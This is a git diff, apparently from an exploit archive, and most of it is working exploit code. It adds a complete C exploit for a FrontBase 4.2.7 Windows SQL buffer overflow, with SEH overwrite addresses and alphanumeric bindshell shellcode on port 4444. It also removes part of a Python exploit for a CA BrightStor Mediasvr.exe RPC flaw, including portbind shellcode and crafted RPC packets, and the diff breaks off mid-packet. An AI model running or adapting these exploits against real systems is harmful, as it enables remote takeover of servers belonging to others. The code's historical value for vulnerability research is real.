+* 
+* ----------------------------------------
+* Target         : Frontbase <= 4.2.7 for Windows
+* Site           : http://www.frontbase.com
+* Found by       : Netragard, L.L.C Advisory
+* ----------------------------------------
+* Exploit date   : 25.03.2007
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS             : Windows 2000 SP4 (will add other later)
+* Crew           : Dreatica-FXP
+* ----------------------------------------
+* Info:
+*    The last Windows version of Frontbase that you can found on official site www.frontbase.com
+* is the 4.2.7d and this version is patched, so the exploit will not work here, i have tested that 
+* exploit on the 4.2.7 version under Windows 2000 SP4 (not patched) and it is working good.
+* 
+* The exploitation, as said in advisory, of this bug is easy: SEH and EIP overwrite methods.
+* but in 'real' life the exploitation is more difficult, cause the server allows only alphanumeric
+* bytes, like: 0x01 0x02 ... 0x7e 0x7f .
+* other bytes: 0x80 ... 0xff come to server transformed:
+*  0xEB will transform in two bytes 0xC2 0xAB
+*  0xFF will transform in two bytes 0xC3 0xBF
+* and etc...
+* 
+* so the exploitation become more difficult here, however in one place of buffer i send to the server byte 
+* 0xff, with assumptions that i will get the bytes 0xC3 0xBF and that the buffer will be one byte longer.
+* 
+* for the correct exploitation i used some code from win32 SEH GetPC project and metasploit for the shellcodes.
+* 
+* so the exploit is:
+*    send 3115 bytes to server + address to overwrite SEH.
+*    in my case i sent 3114 bytes, cause one 0xff transformed in 2 symbols
+* 
+* ----------------------------------------
+* Compiling:
+*  To compile this exploit you need:
+*    1. C:\usr\FrontBase\Include\FBCAccess copy to exploit folder.
+*    2. Copy from C:\usr\FrontBase\lib\ file FBCAccess.lib to your exploit folder.
+*    3. Select FBCAccess.lib in linker options
+*    4. Compile.
+* ----------------------------------------
+* Thanks to:
+*       Netragard, L.L.C Advisory   ( http://www.netragard.com -- "We make I.T. Safe." )
+*       The Metasploit project      ( http://metasploit.com                            ) 
+*       win32 SEH GetPC project     (                                                  ) 
+*       Dreatica-FXP crew           (                                                  )
+* ----------------------------------------
+*
+*/
+
+#include 
+#include 
+#include 
+#include 
+#pragma comment(lib,"ws2_32")
+#include "FBCAccess/FBCAccess.h"
+
+void usage(char * s);
+void logo();
+void prepare_shellcode(unsigned char * fsh, int sh);
+void make_buffer(char * buf, int itarget, int sh);
+int  validate_args( int port, int sh, int itarget);
+int  send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf);
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring);
+char	*optarg;		// global argument pointer
+int		optind = 0, opterr; 	// global argv index
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+struct {
+	const char *t ;
+	unsigned long ret ;
+} targets[]= 
+		{								
+			// we need alphanumeric addreses so this one found in MSVCRT.dll (there are a lot in it) 
+			{"Windows 2000 SP4 no patches, MSVCRT.dll",				0x78014c40 },//pop, pop, ret
+			{"Windows 2000 SP4 no pathces, MSVCRT.dll",						0x7803382b },//jmp ebx
+			{NULL,													0x00000000 }
+		};
+
+struct {
+	const char * name;
+	char * shellcode;
+}shellcodes[]={ 	
+	 {"Spawn bindshell on port 4444", 
+		 /* modified win32_bind -  EXITFUNC=seh LPORT=4444 Encoder=Alpha2 http://metasploit.com 
+		    first jmp instructions replaced by alphanumeric code taken from the win32 SEH GetPC project. */
+		"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48\x50\x68"
+		"\x59\x41\x41\x51\x68\x5A\x59\x59\x59\x59\x41\x41\x51\x51\x44\x44"
+		"\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58\x56\x6A\x30\x50\x50\x54"
+		"\x55\x50\x50\x61\x33\x30\x31\x30\x38\x39\x49\x49\x49\x49\x49\x49"
+		"\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66"
+		"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x76\x32\x42\x42\x32\x41"
+		"\x41\x30\x41\x41\x42\x58\x50\x38\x42\x42\x75\x38\x69\x39\x6c\x52"
+		"\x4a\x5a\x4b\x42\x6d\x68\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x65"
+		"\x30\x6c\x4b\x30\x6c\x31\x34\x71\x34\x4e\x6b\x42\x65\x65\x6c\x6e"
+		"\x6b\x53\x4c\x43\x35\x62\x58\x55\x51\x4a\x4f\x4e\x6b\x72\x6f\x54"
+		"\x58\x6c\x4b\x51\x4f\x77\x50\x53\x31\x78\x6b\x43\x79\x4e\x6b\x54"
+		"\x74\x6c\x4b\x35\x51\x6a\x4e\x64\x71\x6f\x30\x6e\x79\x6e\x4c\x6d"
+		"\x54\x6f\x30\x64\x34\x55\x57\x4f\x31\x59\x5a\x36\x6d\x36\x61\x59"
+		"\x52\x5a\x4b\x4c\x34\x37\x4b\x62\x74\x47\x54\x46\x48\x70\x75\x4d"
+		"\x35\x6c\x4b\x73\x6f\x64\x64\x33\x31\x4a\x4b\x43\x56\x4c\x4b\x44"
+		"\x4c\x62\x6b\x6e\x6b\x63\x6f\x57\x6c\x65\x51\x6a\x4b\x77\x73\x56"
+		"\x4c\x6c\x4b\x6e\x69\x62\x4c\x44\x64\x45\x4c\x55\x31\x6f\x33\x44"
+		"\x71\x6b\x6b\x51\x74\x4e\x6b\x53\x73\x30\x30\x4e\x6b\x57\x30\x34"
+		"\x4c\x6c\x4b\x64\x30\x37\x6c\x4e\x4d\x6c\x4b\x53\x70\x73\x38\x73"
+		"\x6e\x30\x68\x4c\x4e\x62\x6e\x74\x4e\x38\x6c\x30\x50\x79\x6f\x6a"
+		"\x76\x51\x76\x30\x53\x42\x46\x72\x48\x35\x63\x45\x62\x33\x58\x64"
+		"\x37\x64\x33\x74\x72\x43\x6f\x33\x64\x4b\x4f\x78\x50\x52\x48\x38"
+		"\x4b\x7a\x4d\x4b\x4c\x57\x4b\x62\x70\x69\x6f\x6e\x36\x71\x4f\x6e"
+		"\x69\x4b\x55\x33\x56\x6c\x41\x4a\x4d\x76\x68\x74\x42\x63\x65\x51"
+		"\x7a\x77\x72\x4b\x4f\x4a\x70\x63\x58\x6e\x39\x35\x59\x6b\x45\x4e"
+		"\x4d\x30\x57\x4b\x4f\x38\x56\x50\x53\x50\x53\x42\x73\x51\x43\x70"
+		"\x53\x70\x43\x32\x73\x52\x63\x76\x33\x59\x6f\x6e\x30\x55\x36\x33"
+		"\x58\x76\x71\x71\x4c\x63\x56\x56\x33\x6e\x69\x59\x71\x4e\x75\x55"
+		"\x38\x4c\x64\x55\x4a\x72\x50\x6b\x77\x56\x37\x4b\x4f\x4e\x36\x53"
+		"\x5a\x56\x70\x32\x71\x33\x65\x69\x6f\x4e\x30\x62\x48\x39\x34\x4c"
+		"\x6d\x74\x6e\x4a\x49\x63\x67\x69\x6f\x79\x46\x43\x63\x36\x35\x6b"
+		"\x4f\x68\x50\x35\x38\x5a\x45\x70\x49\x6d\x56\x70\x49\x41\x47\x6b"
+		"\x4f\x68\x56\x56\x30\x41\x44\x33\x64\x71\x45\x69\x6f\x4e\x30\x4d"
+		"\x43\x53\x58\x5a\x47\x70\x79\x6b\x76\x73\x49\x41\x47\x49\x6f\x4e"
+		"\x36\x63\x65\x4b\x4f\x4e\x30\x53\x56\x50\x6a\x35\x34\x53\x56\x41"
+		"\x78\x61\x73\x30\x6d\x4c\x49\x4b\x55\x72\x4a\x72\x70\x76\x39\x45"
+		"\x79\x58\x4c\x6b\x39\x59\x77\x31\x7a\x67\x34\x4c\x49\x49\x72\x70"
+		"\x31\x6f\x30\x6c\x33\x6f\x5a\x69\x6e\x72\x62\x36\x4d\x4b\x4e\x53"
+		"\x72\x34\x6c\x6a\x33\x6e\x6d\x62\x5a\x36\x58\x6c\x6b\x4c\x6b\x4e"
+		"\x4b\x61\x78\x30\x72\x6b\x4e\x6d\x63\x46\x76\x4b\x4f\x44\x35\x32"
+		"\x64\x39\x6f\x38\x56\x51\x4b\x70\x57\x52\x72\x70\x51\x32\x71\x53"
+		"\x61\x42\x4a\x43\x31\x56\x31\x46\x31\x70\x55\x43\x61\x79\x6f\x6a"
+		"\x70\x62\x48\x6e\x4d\x59\x49\x67\x75\x7a\x6e\x33\x63\x39\x6f\x59"
+		"\x46\x63\x5a\x59\x6f\x4b\x4f\x76\x57\x6b\x4f\x6a\x70\x4c\x4b\x61"
+		"\x47\x59\x6c\x6b\x33\x38\x44\x43\x54\x49\x6f\x58\x56\x36\x32\x59"
+		"\x6f\x4e\x30\x43\x58\x68\x70\x4f\x7a\x54\x44\x73\x6f\x71\x43\x4b"
+		"\x4f\x4e\x36\x6b\x4f\x78\x50\x66"
+	 },	 
+	{NULL , NULL }
+};
+
+// alphanumeric long back jump, using SEH method!
+char jmptoshellcode[]=
+	// at the time of jump we have in EBX the address where we jumped after SEH exploitation
+	// so we can use it to jump [EBX-0C20]
+	"\x56\x54\x58\x36\x33\x30\x56\x58\x50\x50\x5f\x53\x58\x66\x2d\x20" 
+	"\x0C\x50\x59\x58\x64\x33\x3f\x64\x31\x38\x51\x57\x64\x31\x20\x6c";
+
+
+int main(int argc, char **argv)
+{
+	char temp1[100], temp2[100];
+	char * remotehost=NULL, * user=NULL, * password=NULL, * database=NULL, * dbpassword=NULL;
+	char default_remotehost[]="127.0.0.1";
+	char default_user[]="_SYSTEM";
+	char default_password[]="";
+	char default_database[]="";
+	char default_dbpassword[]="";
+	int port, itarget, sh;
+	char c;		
+	logo();
+	if(argc<2)
+	{
+		usage(argv[0]);		
+		return -1;
+	}
+	// set defaults		
+	port=-1;
+	itarget=0;
+	sh=0;
+	// ------------		
+	while((c = getopt(argc, argv, "h:p:s:t:u:P:d:D:"))!= EOF)
+	{
+		switch (c)
+		{
+			case 'h':
+				remotehost=optarg;
+				break; 	
+			case 's':
+				sscanf(optarg, "%d", &sh);
+				sh--;
+				break;
+			case 't':
+				sscanf(optarg, "%d", &itarget);
+				itarget--;
+				break;
+			case 'p':
+				sscanf(optarg, "%d", &port);
+				break;		
+			case 'u':
+				user=optarg;
+				break; 
+			case 'P':
+				password=optarg;
+				break; 
+			case 'd':
+				database=optarg;
+				break; 
+			default:
+	            usage(argv[0]);
+			return -1;
+		}		
+	}
+	if(validate_args( port, sh, itarget)==-1) return -1;
+	if(remotehost == NULL) remotehost=default_remotehost;
+	if(user       == NULL) user=default_user;
+	if(password   == NULL) password=default_password;
+	if(dbpassword == NULL) dbpassword=default_dbpassword;
+	if(database   == NULL) database=default_database;
+
+	memset(temp1,0,sizeof(temp1));
+	memset(temp2,0,sizeof(temp2));
+	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
+	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
+	if(port!=-1)
+	{
+		sprintf(temp2, "%d", port);
+		memset(temp1,0,sizeof(temp1));
+		memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+		printf(" #  Port    : %s%s# \n", temp2, temp1);
+	}else
+	{
+		sprintf(temp2, "%s", database);
+		memset(temp1,0,sizeof(temp1));
+		memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+		printf(" #  Database: %s%s# \n", temp2, temp1);
+	}
+	sprintf(temp2, "%s", user);
+	memset(temp1,0,sizeof(temp1));
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+	printf(" #  User    : %s%s# \n", temp2, temp1);
+	sprintf(temp2, "%s", database);
+	memset(temp1,0,sizeof(temp1));
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+	printf(" #  Database: %s%s# \n", temp2, temp1);
+	memset(temp1,0,sizeof(temp1));	
+	memset(temp2,0,sizeof(temp2));
+	sprintf(temp2, "%s", shellcodes[sh].name );
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
+	printf(" #  Shellcde: %s%s# \n", temp2, temp1);	
+	memset(temp1,0,sizeof(temp1));	
+	memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);	
+	printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);	
+	printf(" # ------------------------------------------------------------------- # \n");
+	fflush(stdout);
+	
+	char buf[20000];
+	memset(buf,0,sizeof(buf));
+	printf("[+] Constructing attacking buffer... ");
+	fflush(stdout);
+	make_buffer((char *)buf,itarget,sh);
+	printf("done\n");
+
+	if(send_buffer(remotehost,port, user, password, dbpassword, database, buf)==-1)
+	{
+		fprintf(stdout, "[-] Cannot exploit server %s\n", remotehost);		
+		return -1;
+	}
+	return 0;
+}
+
+int validate_args(int port, int sh, int itarget)
+{
+	int i=0,x=0;
+	for(i=0;shellcodes[i].name;i++)if(i==sh)x=1;
+    if(x==0)
+	{
+		printf("[-] The shellcode number is invalid\n");
+		return -1;
+	}	
+	x=0;
+	for(i=0;targets[i].t;i++)if(i==itarget)x=1;
+	if(x==0)
+	{
+		printf("[-] The target is invalid\n");
+		return -1;
+	}	
+	return 1;
+}
+
+void prepare_shellcode( char * fsh, int sh)
+{
+	memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode));	
+}
+
+void make_buffer(char * buf, int itarget, int sh)
+{
+	// -=[ prepare shellcode ]=-
+	char * fsh;
+	fsh = (char *) malloc ((strlen(shellcodes[sh].shellcode)+1) );
+	memset(fsh, 0, (strlen(shellcodes[sh].shellcode)+1));	
+	prepare_shellcode(fsh, sh);
+	// -----------------
+	
+    // -=[ fill buffer here  ]=-
+	memset(buf,0,sizeof(buf));
+	char * cp = buf;
+
+		// make vulnerable sql92 command to get exploit
+	strcat(buf, "create procedure \"");
+	cp=buf+strlen(buf);	
+
+		// some useless bytes
+	memset(cp, 'A', 7);  
+	cp+=strlen((char *)cp);
+
+		// shellcode
+	memcpy(cp, fsh, strlen(fsh));
+	cp+=strlen((char *)cp);
+
+		// fill after shellcode
+	memset(cp, 'A', 3045-strlen(fsh));  
+	cp+=strlen((char *)cp);
+
+		// alphanumeric long jump to our shellcode at the start of the buffer
+	memcpy(cp, jmptoshellcode, strlen(jmptoshellcode));
+	cp+=strlen((char *)cp);
+	memset(cp, 'A', 59-strlen(jmptoshellcode));  
+	cp+=strlen((char *)cp);
+	
+		// at this place in stack points EBX and RET will go here, so we need to jmp upper 
+		// to prepare alphanumeric long jump
+
+	*cp++ = '\x74'; // JNE ... at this point JNE will jump cause the last CMP was 'not equal'
+	*cp++ = '\xff'; // this is not alphanumeric , but the server will transform \xff -> \xC3\xBF
+					// so this will give us the JNE C3 and we will jump upper for 59 bytes
+					// where we put a longer jump to our shellcode. This will add one byte more 
+					// so we will send not 3115, but 3114 bytes to overwrite SEH.
+	*cp++ = '\x41'; 
+
+		// SEH chain overwrite
+	*cp++ = (char)((targets[itarget].ret      ) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >>  8) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
+	
+		// end of the sql92 command
+	memcpy(cp, "\"()\n begin\n end;", strlen("\"()\n begin\n end;"));
+
+	// -----------------
+}
+
+int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf)
+{
+	FBCDatabaseConnection * fbdc;
+	FBCMetaData *meta;
+	char sesn[]="dreatica-fxp";   
+	if(database!=NULL) port = -1;
+	fbcInitialize();	
+   	if (port!=-1)
+	{
+		printf("[+] Connecting to %s:%d\n", host, port);
+		fbdc = fbcdcConnectToDatabaseUsingPort(host, port, dbpassword); 
+	}else
+	{
+		printf("[+] Connecting to %s to database %s\n", host, database);
+		fbdc = fbcdcConnectToDatabase(database, host, dbpassword);
+	}
+	if (fbdc == NULL)
+	{
+		printf("[-] Cannot connect to %s\n", host);
+		return -1;
+	}	
+	char * session_name=sesn;
+	meta = fbcdcCreateSession(fbdc, session_name, user, password, "system_user");
+	if (fbcmdErrorsFound(meta) != 0)
+	{
+		printf("[-] Failed to create session\n");
+		FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
+		char* msgs = fbcemdAllErrorMessages(emd);		
+		fbcemdRelease(emd);
+		free(msgs);
+		fbcmdRelease(meta);
+		fbcdcClose(fbdc);
+		fbcdcRelease(fbdc);
+		return -1;
+	}   
+	fbcmdRelease(meta);
+	printf("[+] Sending %d bytes of buffer to server, check the shell\n", strlen(buf));
+		// if exploit success, the app will stop here.
+	meta = fbcdcExecuteDirectSQL(fbdc, buf);
+	if (fbcmdErrorsFound(meta) != 0)
+	{
+		printf("[-] Failed to send buffer\n");
+		FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
+		char* msgs = fbcemdAllErrorMessages(emd);		
+		fbcemdRelease(emd);
+		free(msgs);
+		fbcmdRelease(meta);
+		fbcdcClose(fbdc);
+		fbcdcRelease(fbdc);
+		return -1;
+	}
+	fbcmdRelease(meta);
+	return 1;
+}
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring)
+{
+	static char *next = NULL;
+	if (optind == 0)
+		next = NULL;
+
+	optarg = NULL;
+
+	if (next == NULL || *next == '\0')
+	{
+		if (optind == 0)
+			optind++;
+
+		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+		{
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		if (strcmp(argv[optind], "--") == 0)
+		{
+			optind++;
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		next = argv[optind];
+		next++;		// skip past -
+		optind++;
+	}
+
+	char c = *next++;
+	char *cp = strchr(optstring, c);
+
+	if (cp == NULL || c == ':')
+		return '?';
+
+	cp++;
+	if (*cp == ':')
+	{
+		if (*next != '\0')
+		{
+			optarg = next;
+			next = NULL;
+		}
+		else if (optind < argc)
+		{
+			optarg = argv[optind];
+			optind++;
+		}
+		else
+		{
+			return '?';
+		}
+	}
+
+	return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+
+
+
+void usage(char * s)
+{	
+	printf(" Usage:\n");
+	printf("    %s -h  -p  -s  -t  -u  -p  -d  -D \n", s);
+    printf(" ----------------------------------------------------------------------- \n");
+	printf(" Arguments:\n");
+	printf("\n");
+	printf("      -h        the host IP to attack\n");
+	printf("      -p        the port of server      (default: -1     )\n");
+	printf("      -s   shellcode number        (default: 0      )\n");
+	printf("      -t      target number           (default: 0      )\n");
+	printf("      -t      target number           (default: 0      )\n");
+	printf("      -u        user name of frontbase  (default: _SYSTEM)\n");
+	printf("      -p    user password           (default: )\n");
+	printf("      -d    database (if port = -1) (default: )\n");
+	printf("      -d  database password       (default: )\n");
+	printf("\n");
+	printf("    Shellcodes:\n");
+	for(int i=0; shellcodes[i].name!=0;i++)
+	{
+		printf("      %d. %s Size=%d\n",i+1,shellcodes[i].name, strlen(shellcodes[i].shellcode));				
+	}	
+	printf("\n");
+	printf("    Targets:\n");
+	for(int j=0; targets[j].t!=0;j++)
+	{
+		printf("      %d. %s\n",j+1,targets[j].t);
+	}		
+	printf("\n");
+	printf(" Examples:\n");
+	printf("    %s -h 127.0.0.1 -d NewDB\n", s);
+	printf("    %s -h 127.0.0.1 -p 1155 -u root -p dta -D dta -t 1\n", s);
+	printf(" ----------------------------------------------------------------------- \n");	
+	
+	
+}
+
+void logo()
+{
+	printf(" ####################################################################### \n");	
+	printf(" #     ____                 __  _                  ______  __    _____ #\n");
+	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
+	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
+	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
+	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
+	printf(" #                                 crew                                #\n");
+	printf(" ####################################################################### \n");	
+	printf(" #  Exploit : Frontbase <= 4.2.7 for Windows                           # \n");
+	printf(" #  Author  : Heretic2 (heretic2x@gmail.com)                           # \n");
+	printf(" #  Version : 1.1                                                      # \n");
+	printf(" #  System  : Windows 2000 SP4                                         # \n");
+	printf(" #  Date    : 25.03.2007                                               # \n");
+	printf(" # ------------------------------------------------------------------- # \n");
+}
+
+// milw0rm.com [2007-03-25]
diff --git a/platforms/windows/remote/36.c b/platforms/windows/remote/36.c
index b5d3ceb79..8bc0996b6 100755
--- a/platforms/windows/remote/36.c
+++ b/platforms/windows/remote/36.c
@@ -302,6 +302,6 @@ shellcode[i-prologuelen];
 	WSACleanup();
 	return (0);
 }
-
-
-// milw0rm.com [2003-06-01]
+
+
+// milw0rm.com [2003-06-01]
diff --git a/platforms/windows/remote/3604.py b/platforms/windows/remote/3604.py
index 027454509..6d995b482 100755
--- a/platforms/windows/remote/3604.py
+++ b/platforms/windows/remote/3604.py
@@ -1,228 +1,228 @@
-#!/usr/bin/python
-#
-# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit
-# (Previously Unknown)
-#
-# There seems to be an design error in the handling of RPC data with xdr procedures
-# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are
-# processed as a particular address (xdr_handle_t data which is run through multiple bit
-# shifts, and reversing of bytes), and eventually loaded into ECX.
-#
-# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may
-# be Null Credentials and Auth?) leads to an exploitable condition.
-#
-# .text:0040AACD 008                 mov     ecx, [esp+8]
-# .text:0040AAD1 008                 mov     dword_418820, esi
-# .text:0040AAD7 008                 push    offset dword_418820
-# .text:0040AADC 00C                 mov     eax, [ecx]
-# .text:0040AADE 00C                 call    dword ptr [eax+2Ch]
-#
-# At this point, you have control of ECX (esp+8 is your address data). The data from the packet
-# is stored in memory and is relatively static (see NOTE).
-#
-# The address is then loaded into EAX, and then called as EAX+2Ch, which is
-# controllable data from the packet. In this code, I just jump ahead to
-# the portbinding shellcode.
-#
-# NOTE: The only issue I have found is when the system is rebooted, the packet data
-# appears at a higher memory location when Mediasvr.exe crashes
-# and is restarted. I have accounted for this in the code, when the port that
-# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after
-# a reboot
-#
-# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest
-# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which
-# is more then likely the memory locations)
-#
-# The patches include the following updates to Mediasvr.exe
-# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp
-#
-# CA has been notified
-#
-# Author: M. Shirk
-# Tester: Tebodell
-#
-# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com
-#
-# Use at your own Risk: You have been warned
-#------------------------------------------------------------------------
-
-import os
-import sys
-import time
-import socket
-import struct
-
-#------------------------------------------------------------------------
-
-#Portbind shellcode; Binds shell on TCP port 4444
-shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
-shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
-shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
-shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
-shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
-shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
-shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
-shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
-shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
-shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
-shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
-shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
-shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
-shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
-shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
-shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
-shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
-shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
-shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
-shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
-shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
-shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
-shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
-shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
-shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
-shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
-shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
-shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
-shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
-shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
-shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
-shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
-shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
-shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
-shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
-shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
-shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
-shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
-
-#------------------------------------------------------------------------
-
-#First Packet
-rpc_packet1="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00"
-rpc_packet1+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
-
-#Prodcedure 191 and nulls
-rpc_packet1+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
-
-#Apparently these 4 bytes can be anything
-rpc_packet1+="\x00\x00\x00\x00"
-
-#This value is important for the location of the next address
-rpc_packet1+="\x00\x00\x00\x00"
-
-#Hardcoded Address loaded into ECX
-rpc_packet1+="\x00\xae\x27\x64"
-
-#Just spacing
-rpc_packet1+="\x41\x42\x43\x44"
-
-#Addess in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
-rpc_packet1+="\x3c\x27\xae\x00"
-
-#jump to shellcode for packet 1
-rpc_packet1+="\x6c\x27\xae\x00"
-rpc_packet1+="\xeb\x01"
-rpc_packet1+=shellcode
-
-#------------------------------------------------------------------------
-
-#Second Packet
-rpc_packet2="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00"
